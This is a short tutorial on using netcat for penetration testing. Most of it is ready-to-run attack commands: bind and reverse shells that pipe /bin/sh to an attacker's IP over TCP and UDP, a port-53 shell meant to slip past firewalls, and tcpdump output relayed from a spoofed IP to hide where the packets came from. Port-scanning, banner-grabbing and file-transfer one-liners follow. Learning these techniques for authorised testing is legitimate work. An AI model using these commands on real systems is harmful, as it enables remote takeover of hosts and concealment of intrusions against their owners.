How To Use Netcat

This very small paper points out a few usage scenarios it can be used for in
penetration testing. One should bear in mind that it can be used for more
complex scenarios or be used in forensics where data is sent to another
machine for store and so on.

Netcat has a compile-time option that makes netcat (from now on nc) execute
a program for the connecting or listening process. This is useful for sending
a shell to the attacker. Also note that the switches might be different on
different platforms, ie. OpenBSD is lacking the -p switch.

Download Netcat Here :
Unix | Win

Alternatives:
http://farm9.com/content/Free_Tools/Cryptcat - Encrypted traffic with Blowfish
http://www.dest-unreach.org/socat/ - Netcat with extended design & features
http://www.stunnel.org/ - Useful if you need to do stuff with HTTPS

TCP
---

If there is no firewall protecting the target and there is nc available (or
it has been uploaded somehow), and there is a way to issue commands on the
target(ie. badly programmed web-application), the attacker could put up a
nc-listener that shovels back an interactive shell:

On the target:
nc -l -p port -e /bin/sh

From the attacker:
nc target_ip port

If there is however a firewall in place that stops the attacker from connecting
to a specific port on the target-system, they could try to get the target to
connect back to them. This is possible only if the firewall allows certain out-
going connections:

On the attacker:
nc -l -p port

From the target:
nc -e /bin/sh attacker_ip port

In the case where nc has not been compiled with the -e option, there is still
ways to shovel back a shell to the attacker. By piping stdin to another
listener and stdout to another, the attacker gets one console for issuing
commands and one console for the results:

On the attacker:
nc -l -p port1
nc -l -p port2

From the target:
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2


UDP
---

In the case where TCP is restricted, one has to check for possible UDP avenues.
UDP however is unreliable, but it can work, and allows spoofing if there is
need for it. After testing it, we concluded that it has to be used in the two
console way. It wasn't working without echoing an initial character:

On the attacker:
nc -l -u -p port1
nc -l -u -p port2

From the target:
echo "" | nc -u attacker_ip port1 | /bin/sh | nc -u attacker_ip port2

This way however means that there is two udp-ports available. There is
another way where one port is enough. This usually means port 53 as it could
be wrongly configured at the firewall level, allowing it both ways:

On attacker:
nc -l -u -p 53

On target:
nc -u -l -p 53 | /bin/sh | nc -u attacker_ip 53

From attacker:
cat | nc -u target_ip 53

By using this way, the attacker has again a command console and an output
console available. One should remember that if using ports under 1024, there
must be access equivalent to system/root/administrator available. UDP method
would not work behind a NATted environment.


Portscanning:
-------------

Examples:
TCP: nc -vvn -z xxx.xxx.xxx.xxx 21-25
UDP: nc -u -vvn -z xxx.xxx.xxx.xxx 514


Banner-grabbing:
----------------

Win:
for /f %1 in (iplist.txt) do nc -vvn %1 80 <>

Unix:
for f in `cat iplist.txt`; do nc $f 80 <>

Get.txt would contain head / http/1.0 and two returns, or just two returns and
it would work on other ports too. Iplist.txt would contain IPs that you want
to scan.

When HTTPS is involved, you might want to look into stunnel:
(echo "HEAD / HTTP/1.0"; echo; ) | /usr/sbin/stunnel -c -r host:port


Transferring files:
-------------------

Listener:
nc -vvnlp 3000 -w 3 > file

Sender:
nc -vvn xxx.xxx.xxx.xx 3000 <>

You can also do a neat trick with udp & ip-spoofing. If you are listening for
traffic on a segment, you could send the traffic to another host via UDP. This
only works if you don't care about ACKs and to our opinion its useful only if
you want to hide the origins of the packets.

Tcpdump usage would be done like this:

tcpdump -l -xX -vvv -tttt | nc -u -s spoofed_ip listener_ip

This however requires you to bind the spoofed IP to your interface, in Linux
it can be done by typing 'ifconfig eth0:n spoofed_ip', where n is the next
free alias. This will cause problems with the host you're spoofing, as you
broadcast the same IP on the network. To perform similar stuff without causing
that much problems, you could check out hping.

As an end note, we like to say that use your own imagination. Netcat is not
called the Swiss Army Knife of networking tools for nothing :)

Happy netcatting :)